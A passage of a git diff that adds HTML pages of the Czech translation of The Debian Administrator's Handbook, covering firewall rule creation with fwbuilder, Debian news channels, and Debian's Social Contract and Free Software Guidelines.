+              class="para">
+					The <code
+                class="literal">DNAT</code> action provides the <code
+                class="literal">--to-destination <em
+                  class="replaceable">address</em>:<em
+                  class="replaceable">port</em></code> option to indicate the new destination IP address and/or port. Similarly, <code
+                class="literal">SNAT</code> provides <code
+                class="literal">--to-source <em
+                  class="replaceable">address</em>:<em
+                  class="replaceable">port</em></code> to indicate the new source IP address and/or port.
+				</div><div
+              class="para">
+					The <code
+                class="literal">REDIRECT</code> action (only available if NAT is available) provides the <code
+                class="literal">--to-ports <em
+                  class="replaceable">port(s)</em></code> option to indicate the port, or port range, where the packets should be redirected.
+				</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.creating-rules"></a>14.2.3. Creating Rules</h3></div></div></div><div
+            class="para">
+				Each rule creation requires one invocation of <code
+              class="command">iptables</code>/<code
+              class="command">ip6tables</code>. Typing these commands manually can be tedious, so the calls are usually stored in a script so that the same configuration is set up automatically every time the machine boots. This script can be written by hand, but it can also be interesting to prepare it with a high-level tool such as <code
+              class="command">fwbuilder</code>.
+			</div><pre
+            class="screen">
+<code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>apt install fwbuilder</code></strong></pre><div
+            class="para">
+				The principle is simple. In the first step, one needs to describe all the elements that will be involved in the actual rules:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						the firewall itself, with its network interfaces;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						the networks, with their corresponding IP ranges;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						the servers;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						the ports belonging to the services hosted on the servers.
+					</div></li></ul></div><div
+            class="para">
+				The rules are then created with simple drag-and-drop actions on the objects. A few contextual menus can change the condition (negating it, for instance). Then the action needs to be chosen and configured.
+			</div><div
+            class="para">
+				As far as IPv6 is concerned, one can either create two distinct rulesets for IPv4 and IPv6, or create only one and let <code
+              class="command">fwbuilder</code> translate the rules according to the addresses assigned to the objects.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="figure.fwbuilder"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/fwbuilder.png"
+                  alt="Fwbuilder's main window" /></div></div><p
+              class="title"><strong>Obrázek 14.2. Fwbuilder's main window</strong></p></div><a
+            id="id-1.17.5.14.9"
+            class="indexterm"></a><div
+            class="para">
+				<code
+              class="command">fwbuilder</code> can then generate a script configuring the firewall according to the rules that have been defined. Its modular architecture gives it the ability to generate scripts targeting different systems (<code
+              class="command">iptables</code> for Linux, <code
+              class="command">ipf</code> for FreeBSD and <code
+              class="command">pf</code> for OpenBSD).
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.install-rules-at-boot"></a>14.2.4. Installing the Rules at Each Boot</h3></div></div></div><div
+            class="para">
+				In other cases, the recommended way is to register the configuration script in an <code
+              class="literal">up</code> directive of the <code
+              class="filename">/etc/network/interfaces</code> file. In the following example, the script is stored under <code
+              class="filename">/usr/local/etc/arrakis.fw</code>.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="example.network-interfaces-firewall"></a><p
+              class="title"><strong>Příklad 14.1. <code
+                  class="filename">interfaces</code> file calling firewall script</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">auto eth0
+iface eth0 inet static
+    address 192.168.0.1
+    network 192.168.0.0
+    netmask 255.255.255.0
+    broadcast 192.168.0.255
+    up /usr/local/etc/arrakis.fw
+</pre></div></div><div
+            class="para">
+				This obviously assumes that you are using <span
+              class="pkg pkg">ifupdown</span> to configure the network interfaces. If you are using something else (like <span
+              class="emphasis"><em>NetworkManager</em></span> or <span
+              class="emphasis"><em>systemd-networkd</em></span>), then refer to their respective documentation to find out ways to execute a script after the interface has been brought up.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="security.html"><strong>Předcházející</strong>Kapitola 14. Security</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.supervision.html"><strong>Další</strong>14.3. Supervision: Prevention, Detection, Deterre...</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.follow-debian-news.html b/tmp/cs-CZ/html/sect.follow-debian-news.html
new file mode 100644
index 000000000..4dcfb81fa
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.follow-debian-news.html
@@ -0,0 +1,178 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">1.4. Follow Debian News</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Cíl, Prostředky, Operace, Dobrovolník" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="the-debian-project.html"
+        title="Kapitola 1. Projekt Debian" /><link
+        rel="prev"
+        href="sect.debian-internals.html"
+        title="1.3. Vnitřní fungování projektu Debian" /><link
+        rel="next"
+        href="sect.role-of-distributions.html"
+        title="1.5. The Role of Distributions" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.follow-debian-news.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.debian-internals.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.role-of-distributions.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.follow-debian-news"></a>1.4. Follow Debian News</h2></div></div></div><div
+          class="para">
+			As already mentioned, the Debian project evolves in a very distributed, very organic way. As a consequence, it may be difficult at times to stay in touch with what happens within the project without being overwhelmed with a never-ending flood of notifications.
+		</div><div
+          class="para">
+			If you only want the most important news about Debian, you probably should subscribe to the <code
+            class="email"><a
+              class="email"
+              href="mailto:debian-announce@lists.debian.org">debian-announce@lists.debian.org</a></code> list. This is a very low-traffic list (around a dozen messages a year), and only gives the most important announcements, such as the availability of a new stable release, the election of a new Project Leader, or the yearly Debian Conference. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="https://lists.debian.org/debian-announce/">https://lists.debian.org/debian-announce/</a></div>
+		</div><a
+          id="id-1.4.7.4"
+          class="indexterm"></a><div
+          class="para">
+			More general (and regular) news about Debian are sent to the <code
+            class="email"><a
+              class="email"
+              href="mailto:debian-news@lists.debian.org">debian-news@lists.debian.org</a></code> list. The traffic on this list is quite reasonable too (usually around a handful of messages a month), and it includes the semi-regular “Debian Project News”, which is a compilation of various small bits of information about what happens in the project. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="https://lists.debian.org/debian-news/">https://lists.debian.org/debian-news/</a></div>
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>COMMUNITY</em></span> The publicity team</strong></p></div></div></div><div
+            class="para">
+			Debian's official communication channels are managed by volunteers of the Debian publicity team. They are delegates of the Debian Project Leader and moderate news and announcements posted there. Many other volunteers contribute to the team, for example by writing articles for “Debian Project News” or by animating the microblogging service (<a
+              href="https://micronews.debian.org/">micronews.debian.org</a>). <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://wiki.debian.org/Teams/Publicity">https://wiki.debian.org/Teams/Publicity</a></div>
+		</div></div><div
+          class="para">
+			For more information about the evolution of Debian and what is happening at some point in time in various teams, there's also the <code
+            class="email"><a
+              class="email"
+              href="mailto:debian-devel-announce@lists.debian.org">debian-devel-announce@lists.debian.org</a></code> list. As its name implies, the announcements it carries will probably be more interesting to developers, but it also allows interested parties to keep an eye on what happens in more concrete terms than just when a stable version is released. While <code
+            class="email"><a
+              class="email"
+              href="mailto:debian-announce@lists.debian.org">debian-announce@lists.debian.org</a></code> gives news about the user-visible results, <code
+            class="email"><a
+              class="email"
+              href="mailto:debian-devel-announce@lists.debian.org">debian-devel-announce@lists.debian.org</a></code> gives news about how these results are produced. As a side note, “d-d-a” (as it is sometimes referred to) is the only list that Debian developers must be subscribed to. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="https://lists.debian.org/debian-devel-announce/">https://lists.debian.org/debian-devel-announce/</a></div>
+		</div><div
+          class="para">
+			Debian's official blog (<a
+            href="https://bits.debian.org">bits.debian.org</a>) is also a good source of information. It conveys most of the interesting news that are published on the various mailing lists that we already covered and other important news contributed by community members. Since all Debian developers can contribute these news when they think they have something noteworthy to make public, Debian's blog gives a valuable insight while staying rather focused on the project as a whole.
+		</div><a
+          id="id-1.4.7.9"
+          class="indexterm"></a><div
+          class="para">
+			A more informal source of information can also be found on Planet Debian, which aggregates articles posted by Debian contributors on their respective blogs. While the contents do not deal exclusively with Debian development, they provide a view into what is happening in the community and what its members are up to. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="https://planet.debian.org/">https://planet.debian.org/</a></div>
+		</div><a
+          id="id-1.4.7.11"
+          class="indexterm"></a><a
+          id="id-1.4.7.12"
+          class="indexterm"></a><a
+          id="id-1.4.7.13"
+          class="indexterm"></a><a
+          id="id-1.4.7.14"
+          class="indexterm"></a><a
+          id="id-1.4.7.15"
+          class="indexterm"></a><a
+          id="id-1.4.7.16"
+          class="indexterm"></a><a
+          id="id-1.4.7.17"
+          class="indexterm"></a><div
+          class="para">
+			The project is also well represented on social networks. While Debian only has an official presence on platforms built with free software (like the Identi.ca microblogging platform, powered by <span
+            class="emphasis"><em>pump.io</em></span>), there are many Debian contributors who are animating Twitter accounts, Facebook pages, Google+ pages, and more. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="https://identi.ca/debian">https://identi.ca/debian</a></div> <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="https://twitter.com/debian">https://twitter.com/debian</a></div> <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="https://www.facebook.com/debian">https://www.facebook.com/debian</a></div> <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="https://plus.google.com/111711190057359692089">https://plus.google.com/111711190057359692089</a></div>
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.debian-internals.html"><strong>Předcházející</strong>1.3. Vnitřní fungování projektu Debian</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.role-of-distributions.html"><strong>Další</strong>1.5. The Role of Distributions</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.foundation-documents.html b/tmp/cs-CZ/html/sect.foundation-documents.html
new file mode 100644
index 000000000..e463fe092
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.foundation-documents.html
@@ -0,0 +1,413 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">1.2. Dokumenty nadace</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Cíl, Prostředky, Operace, Dobrovolník" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="the-debian-project.html"
+        title="Kapitola 1. Projekt Debian" /><link
+        rel="prev"
+        href="the-debian-project.html"
+        title="Kapitola 1. Projekt Debian" /><link
+        rel="next"
+        href="sect.debian-internals.html"
+        title="1.3. Vnitřní fungování projektu Debian" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.foundation-documents.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="the-debian-project.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.debian-internals.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.foundation-documents"></a>1.2. Dokumenty nadace</h2></div></div></div><a
+          id="id-1.4.5.2"
+          class="indexterm"></a><div
+          class="para">
+			Několik let po prvotním vydání, Debian formálně stanovil principy, které by měl dodržovat jako svobodný software. Toto úmyslně aktivistické rozhodnutí umožňuje řádný a bezproblémový růst tím, že zajistí, aby se všechny části ubíraly stejným směrem. K tomu, aby se stal vývojářem Debianu, musí každý uchazeč potvrdit a prokázat svou podporu a dodržování zásad stanovených v nadačních dokumentech projektu.
+		</div><div
+          class="para">
+			Proces vývoje je neustále projednáván, ale tyto nadační dokumenty jsou obecně a shodně podporovány, a tak zřídka měněny. Stanovy Debianu nabízí také další záruky pro jejich stálost: ke schválení jakékoliv jejich změny je potřeba tří čtvrtin kvalifikované většiny.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.social-contract"></a>1.2.1. Závazek vůči uživatelům</h3></div></div></div><a
+            id="id-1.4.5.5.2"
+            class="indexterm"></a><a
+            id="id-1.4.5.5.3"
+            class="indexterm"></a><div
+            class="para">
+				Projekt má také “společenskou smlouvu”. Jaké místo má takovýto text v projektu, který je určen pouze pro vývoj operačního systému? To je docela jednoduché: Debian pracuje pro své uživatele, a tím potažmo i pro společnost. Tato smlouva shrnuje závazky, ke kterým se projekt zavazuje. Dovolte nám je podrobněji popsat:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="orderedlist"><ol><li
+                class="listitem"><div
+                  class="para">
+						Debian zůstane ze 100% zdarma.
+					</div><div
+                  class="para">
+						Toto je pravidlo č. 1. Debian je a zůstane zcela a výhradně složen z volného softwaru. Navíc, veškerý vývoj softwaru sám o sobě v rámci projektu Debian, bude zdarma.
+					</div><div
+                  class="sidebar"><div
+                    class="titlepage"><div><div><p
+                          class="title"><strong><span
+                              class="emphasis"><em>POHLED</em></span>za software</strong></p></div></div></div><div
+                    class="para">
+						První verze sociální smlouvy Debianu říkala “Debian zůstane 100% svobodný <span
+                      class="emphasis"><em>software</em></span>”. Vyouštění tohoto slova (se schválením verze 1.1 smlouvy v dubnu 2004) naznačuje vůli dosáhnout svobody, a to nejen v softwaru, ale také v dokumentaci a jakémkoliv jiném prvku, který Debian chce poskytovat v rámci svého operačního systému.
+					</div><div
+                    class="para">
+						Tato změna, která byla zamýšlena pouze jako redakční, měla ve skutečnosti četné následky, zejména v odstranění některé problematické dokumentace. Navíc, problém představuje také stále častější používání firmwaru v ovladačích: mnohé z nich nejsou volné, ale jsou nezbytné pro správné fungování odpovídajícího hardwaru.
+					</div></div></li><li
+                class="listitem"><div
+                  class="para">
+						Vratíme se zpět ke komunitě svobodného softwaru.
+					</div><div
+                  class="para">
+						Jakékoli zlepšení, kterým projekt Debian přispěl k práci zahrnuté v distribuci, je zasláno zpět autorovi ( tzv. “upstream”). Obecně, Debian bude spolupracovat s komunitou spíše, než pracovat v izolaci.
+					</div><div
+                  class="sidebar"><div
+                    class="titlepage"><div><div><p
+                          class="title"><strong><span
+                              class="emphasis"><em>KOMUNITA</em></span> Upstreamový autor nebo vývojář Debianu?</strong></p></div></div></div><a
+                    id="id-1.4.5.5.5.2.3.2"
+                    class="indexterm"></a><a
+                    id="id-1.4.5.5.5.2.3.3"
+                    class="indexterm"></a><a
+                    id="id-1.4.5.5.5.2.3.4"
+                    class="indexterm"></a><div
+                    class="para">
+						Termínem “upstreamový autor” se rozumí autor (autoři) / vývojář (vývojáři) díla, ti, kteří ho píší a vyvíjí. Na druhou stranu, “vývojář Debianu” používá už existující práci a zahrnuje ji do balíku Debianu (termín “správce Debianu” je vhodnější).
+					</div><div
+                    class="para">
+						V praxi se takové rozlišování často nepovažuje za jednoznačné. Správce Debianu může napsat opravu, která prospívá všem uživatelům díla. Obecně Debian podporuje ty, kteří mají balíček v Debianu na starosti, aby se také zapojili do “upstreamového” vývoje (tak se potom stanou přispěvateli, aniž by byli omezeni na roli pouhých uživatelů programu).
+					</div></div></li><li
+                class="listitem"><div
+                  class="para">
+						Nebudeme skrývat problémy.
+					</div><div
+                  class="para">
+						Debian není dokonalý a nové problémy, které je třeba opravit budeme nacházet každý den. Celou databázi chybových hlášení budeme mít pro veřejnost kdykoliv otevřenou k nahlédnutí. Hlášení, která lidé zakládají online se okamžitě zviditelní ostatním.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						Našimi prioritami jsou naši uživatelé a svobodný software.
+					</div><div
+                  class="para">
+						Tento závazek je obtížnější definovat. Debian ukládá, tedy pokud je zapotřebí učinit rozhodnutí, zahodit pro vývojáře jednoduché řešení, které bude ohrožovat uživatelskou přívětivost, rozhodout se pro elegantnější řešení, i když je obtížnější ho realizovat. To znamená, že prioritou je zohlednit zájmy uživatelů a volného softwaru.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						Práce, které nesplňují naše standardy volného softwaru.
+					</div><div
+                  class="para">
+						Debian akceptuje a chápe, že uživatelé mohou chtít používat některé programy, co nejsou volné. Proto projekt umožňuje využití částí své infrastruktury k distribuci debianovských balíčků nesvobodného softwaru, které lze bezpečně předistribuovat.
+					</div><div
+                  class="sidebar"><div
+                    class="titlepage"><div><div><p
+                          class="title"><strong><span
+                              class="emphasis"><em>KOMUNITA</em></span> Pro nebo proti nesvobodné sekci?</strong></p></div></div></div><a
+                    id="id-1.4.5.5.5.5.3.2"
+                    class="indexterm"></a><a
+                    id="id-1.4.5.5.5.5.3.3"
+                    class="indexterm"></a><div
+                    class="para">
+						Závazek udržovat strukturu pro přizpůsobení nesvobodného softwaru (tj. “nesvobodná” sekce, viz postranní panel <a
+                      class="xref"
+                      href="apt.html#sidebar.sections"><span
+                        class="emphasis"><em>VOCABULARY</em></span> The <code
+                        class="literal">main</code>, <code
+                        class="literal">contrib</code> and <code
+                        class="literal">non-free</code> archives</a>) je často předmětem debaty v rámci komunity Debianu.
+					</div><div
+                    class="para">
+						Odpůrci tvrdí, že se to odvrací lidi od volných softwarových ekvivalentů, a je v rozporu se zásadou ve věci poskytování pouze svobodného software. Příznivci nekompromisně konstatují, že většina nesvobodných balíků jsou “téměř zdarma”, a zadržovány jedním nebo dvěma otravnými omezeními (nejběžnější je zákaz komerčního používání softwaru). Distribucí těchto děl v nesvobodné větvi, nepřímo říkáme autorovi, že jeho dílo by bylo lépe známé a hojně používané, pokud by bylo zahrnuto v hlavní sekci. Jsou tak zdvořile vyzváni, aby změnili svou licenci tak, aby vyhovovala tomuto záměru.
+					</div><div
+                    class="para">
+						Po prvním, bezvýsledném pokusu v roce 2004, je navrácení úplného odstranění nesvobodné sekce na pořad jednání nepravděpodobné, zejména proto, že obsahuje mnoho užitečných dokumentů, které byly přesunuty jednoduše proto, že nesplňovaly nové požadavky pro hlavní část. To platí zejména pro některé soubory dokumentace softwaru vydané projektem GNU (zejména Emacs a Make).
+					</div><div
+                    class="para">
+						Pokračující existence nesvobodné sekce je zdrojem příležitostných třenic s Nadací svobodného softwaru, a je hlavním důvodem, proč odmítá oficiálně doporučit Debian jako operační systém.
+					</div></div></li></ol></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.dfsg"></a>1.2.2. Pokyny Debianu pro svobodný software</h3></div></div></div><a
+            id="id-1.4.5.6.2"
+            class="indexterm"></a><a
+            id="id-1.4.5.6.3"
+            class="indexterm"></a><a
+            id="id-1.4.5.6.4"
+            class="indexterm"></a><a
+            id="id-1.4.5.6.5"
+            class="indexterm"></a><div
+            class="para">
+				Tento referenční dokument určuje, který software je “dostatečně volný”, aby byl zahrnut do Debianu. Pokud je licence programu v souladu s těmito zásadami, může být zahrnuta do hlavní části; Naopak, a za předpokladu, že volné šíření je zakázáno, jej lze nalézt v nesvobodné sekci. Nesvobodná sekce není oficiální součástí Debianu; Jedná se o přidanou službu poskytovanou uživatelům.
+			</div><div
+            class="para">
+				Více než jen výběrovými kritérii pro Debian, se tento text se stal autoritou na téma svobodného softwaru, a sloužil jako základ pro “definici Open Source”. Historicky je tedy jednou z prvních formálních definic pojmu “svobodný software”.
+			</div><div
+            class="para">
+				Všeobecná veřejná licence GNU, BSD licence a Umělecká licence jsou příklady tradičních svobodných licencí, které ctí 9 bodů uvedených v tomto textu. Níže najdete text, který je publikován na webových stránkách Debianu. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://www.debian.org/social_contract#pokyny">http://www.debian.org/social_contract#pokyny</a></div>
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="orderedlist"><ol><li
+                class="listitem"><div
+                  class="para"><div
+                    class="title">Volná redistribuce.</div>
+							Licence na jakoukoliv součást Debianu nesmí omezovat žádnou stranu v prodeji nebo darování softwaru jako součásti souhrnné distribuce softwaru obsahující programy z několika různých zdrojů. Licence nesmí zahrnovat honorář nebo jiný poplatek za tento prodej.
+						</div><div
+                  class="sidebar"><div
+                    class="titlepage"><div><div><p
+                          class="title"><strong><span
+                              class="emphasis"><em>ZPĚT K ZÁKLADŮM</em></span>Svobodná licence</strong></p></div></div></div><a
+                    id="id-1.4.5.6.9.1.2.2"
+                    class="indexterm"></a><a
+                    id="id-1.4.5.6.9.1.2.3"
+                    class="indexterm"></a><a
+                    id="id-1.4.5.6.9.1.2.4"
+                    class="indexterm"></a><a
+                    id="id-1.4.5.6.9.1.2.5"
+                    class="indexterm"></a><a
+                    id="id-1.4.5.6.9.1.2.6"
+                    class="indexterm"></a><a
+                    id="id-1.4.5.6.9.1.2.7"
+                    class="indexterm"></a><a
+                    id="id-1.4.5.6.9.1.2.8"
+                    class="indexterm"></a><a
+                    id="id-1.4.5.6.9.1.2.9"
+                    class="indexterm"></a><div
+                    class="para">
+						GNU GPL, BSD licence a Umělecká licence jsou v souladu s Pokyny Debianu pro svobodný software, i když jsou velmi odlišné.
+					</div><div
+                    class="para">
+						GNU GPL, kterou používá a propaguje FSF (Free Software Foundation), je nejběžnější. Její hlavní vlastností je, že se vztahuje i na práci z ní vycházející, která se redistribuje: program zahrnující nebo používající GPL kód může být distribuován pouze v souladu s jeho podmínkami. Zakazuje tedy jakékoli opětovné použití v proprietární aplikaci. To představuje vážné problémy při opětovném použití GPL kódu ve volném softwaru nevyhovujícímu této licenci. Takto je někdy nemožné propojit program zveřejněný pod jinou licencí svobodného softwaru s knihovnou distribuovanou pod GPL. Na druhou stranu, tato licence je velmi pevná v základech v americkém právu: právníci FSF se podíleli na jejím navrhování, takže narušitelé jsou často nuceni dosáhnout přátelské dohody s FSF, aniž by se šlo k soudu. <div
+                      xmlns=""
+                      class="url">→ <a
+                        xmlns="http://www.w3.org/1999/xhtml"
+                        href="http://www.gnu.org/copyleft/gpl.html">http://www.gnu.org/copyleft/gpl.html</a></div>
+					</div><div
+                    class="para">
+						The BSD license is the least restrictive: everything is permitted, including use of modified BSD code in a proprietary application. <div
+                      xmlns=""
+                      class="url">→ <a
+                        xmlns="http://www.w3.org/1999/xhtml"
+                        href="http://www.opensource.org/licenses/bsd-license.php">http://www.opensource.org/licenses/bsd-license.php</a></div>
+					</div><div
+                    class="para">
+						Nakonec, Umělecká licence dosahuje kompromisu mezi těmito ostatními dvěma: je povoleno zahrnuzí kódu do proprietární aplikace, ale jakákoliv modifikace musí být zveřejněna. <div
+                      xmlns=""
+                      class="url">→ <a
+                        xmlns="http://www.w3.org/1999/xhtml"
+                        href="http://www.opensource.org/licenses/artistic-license-2.0.php">http://www.opensource.org/licenses/artistic-license-2.0.php</a></div>
+					</div><div
+                    class="para">
+						Kompletní znění těchto licencí je k dispozici v <code
+                      class="filename">/usr/share/Common-licenses/</code> v libovolném systému Debianu.
+					</div></div></li><li
+                class="listitem"><div
+                  class="para"><div
+                    class="title">Zdrojový kód.</div>
+							Program musí obsahovat zdrojový kód a musí umožňovat distribuci ve zdrojovém kódu, stejně jako v kompilované podobě.
+						</div></li><li
+                class="listitem"><div
+                  class="para"><div
+                    class="title">Odvozená díla.</div>
+							Licence musí umožňovat úpravy a odvozená díla, a musí umožňovat jejich distribuci za stejných podmínek jako měla licence původního softwaru.
+						</div></li><li
+                class="listitem"><div
+                  class="para"><div
+                    class="title">Integrita zdrojového kódu autora.</div>
+							Licence může omezit distribuci zdrojového kódu v modifikované podobě <span
+                    class="emphasis"><em>pouze</em></span> pokud licence umožňuje distribuci “patch souborů” se zdrojovým kódem pro účely úpravy programu v okamžiku sestavení. Licence musí výslovně umožňovat distribuci softwaru vytvořeného z modifikovaného zdrojového kódu. Licence může vyžadovat, aby odvozená díla nesla název nebo číslo odlišné od původního softwaru (<span
+                    class="emphasis"><em>Toto je kompromis. Skupina Debian nabádá všechny autory, aby nezakazovali úpravy souborů, zdrojových nebo binárních</em></span>).
+						</div></li><li
+                class="listitem"><div
+                  class="para"><div
+                    class="title">Žádná diskriminace osob nebo skupin.</div>
+							Licence nesmí diskriminovat žádnou osobu ani skupinu osob.
+						</div></li><li
+                class="listitem"><div
+                  class="para"><div
+                    class="title">Diskriminace proti žádné oblasti lidského úsilí.</div>
+							Licence nesmí nikomu bránit v užívání programu v konkrétní oblasti lidského úsilí. Například nesmí zakazovat používání programu v podnicích nebo při genetickém výzkumu.
+						</div></li><li
+                class="listitem"><div
+                  class="para"><div
+                    class="title">Přenesení licence.</div>
+							Práva spojená s programem se musí vztahovat na všechny, komu je program distribuován bez nutnosti provedení dodatečné licence těmito stranami.
+						</div></li><li
+                class="listitem"><div
+                  class="para"><div
+                    class="title">Licence nemůže být pro Debian specifická.</div>
+							Práva spojená s programem nemůžou záviset na tom, že je program součástí systému Debian. Pokud je program vyjmut z Debianu a používán nebo distribuován bez Debianu, ale jinak v rámci podmínek licence programu, všechny strany, kterým je program distribuován, by měly mít stejná práva jako ta, která jsou udělena ve spojení se systémem Debian.
+						</div></li><li
+                class="listitem"><div
+                  class="para"><div
+                    class="title">Licence nesmí kontaminovat jiný software.</div>
+							Licence nesmí omezovat ostatní software, který je distribuován spolu s licencovaným softwarem. Například, licence nesmí trvat na tom, že všechny ostatní programy distribuované na stejném médiu musí být svobodný software.
+						</div><div
+                  class="sidebar"><div
+                    class="titlepage"><div><div><p
+                          class="title"><strong><span
+                              class="emphasis"><em>ZPĚT K ZÁKLADŮM</em></span> Copyleft</strong></p></div></div></div><a
+                    id="id-1.4.5.6.9.9.2.2"
+                    class="indexterm"></a><a
+                    id="id-1.4.5.6.9.9.2.3"
+                    class="indexterm"></a><div
+                    class="para">
